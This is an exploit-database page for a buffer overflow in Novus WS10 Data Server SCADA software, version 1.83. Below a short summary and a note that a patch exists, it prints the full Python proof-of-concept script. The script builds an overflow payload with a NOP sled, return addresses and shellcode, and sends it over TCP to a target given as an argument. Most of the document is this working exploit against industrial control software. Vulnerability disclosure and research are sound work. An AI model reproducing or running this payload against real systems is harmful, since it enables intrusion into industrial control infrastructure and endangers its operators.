header-logo
Suggest Exploit
vendor:
WS10 Data Server SCADA
by:
Pedro Sánchez
9,3
CVSS
HIGH
Buffer Overflow
119
CWE
Product Name: WS10 Data Server SCADA
Affected Version From: 1.83 (English)
Affected Version To: N/A
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows 7 embedded
2014

WS10 Data Server SCADA Exploit Overflow PoC

A buffer overflow vulnerability exists in the WS10 Data Server SCADA software, which could allow an attacker to execute arbitrary code on the target system. The vulnerability is due to insufficient boundary checks when handling user-supplied input. An attacker can exploit this vulnerability by sending a specially crafted packet to the vulnerable application. This will cause a buffer overflow, allowing the attacker to execute arbitrary code on the target system.

Mitigation:

The vendor has released a patch to address this vulnerability. Users should update to the latest version of the software.
Source

Exploit-DB raw data:

## Exploit Title: WS10 Data Server SCADA Exploit Overflow PoC
## Date: 09/23/2014
## Author: Pedro Sánchez
## Version: 1.83 (English)
## Tested on: Windows 7 embedded. 

## Notified the vendor, vendor never responded.
## In the new version this PoC stops working
 
## Vendor: Novus 
## http://www.novus.com.br
 
## NOVUS Electronics is a manufacturer of instruments for control, data acquisition and supervisory systems, mainly for factory automation 
 
import os
import socket
import sys

## The process listens on TCP port 2001

host = sys.argv[1]
port = int(sys.argv[2])
 
print " PoC WS10 Data Server SCADA Exploit "
print " Pedro Sanchez "
 
shellcode = ("\x33\xC0\x50\x68\x63\x61\x6C\x63\x54\x5B\x50\x53\xB9\x44\x80\xc2\x77\xFF\xD1\x90\x90") 
 
## Exploit contructor

	ws10 = ("\x90" * 1024 + "\x44" * 31788) 
	ws10 += ("\xeb\x14") 
	ws10 += ("\x44" * 6) 
	ws10 += ("\xad\xbb\xc3\x77") 
	ws10 += ("\xb4\x73\xed\x77")  
	ws10 += ("\x90" * 21) 
	ws10 += shellcode

 
print "  [+] Sending payload..."
 
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)  
s.connect((host,port)) 
s.send(ws10)  
data = s.recv(1024)
 
print "  [+] Closing..."
s.close()  
print "  [+] Done!"

Navigation

Suggest Exploit

Services By CQR